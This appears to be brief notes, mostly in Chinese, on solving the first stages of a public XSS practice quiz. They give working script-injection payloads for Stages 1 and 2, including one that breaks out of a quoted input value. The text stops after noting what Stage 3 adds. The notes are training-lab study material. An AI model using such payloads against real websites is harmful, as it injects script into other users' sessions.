xss-quiz: http://xss-quiz.int21h.jp/
Stage 1
payload:1<script>alert(document.domain)</script>
Stage 2
http://xss-quiz.int21h.jp/stage2.php
尝试如下payload:1<script>alert(document.domain)</script>
无反应,查看源代码:
需要闭合前面value的双引号,所以最后payload如下:1"><script>alert(document.domain)</script>"
Stage 3
http://xss-quiz.int21h.jp/stage-3.php
多了一个选择country的功能。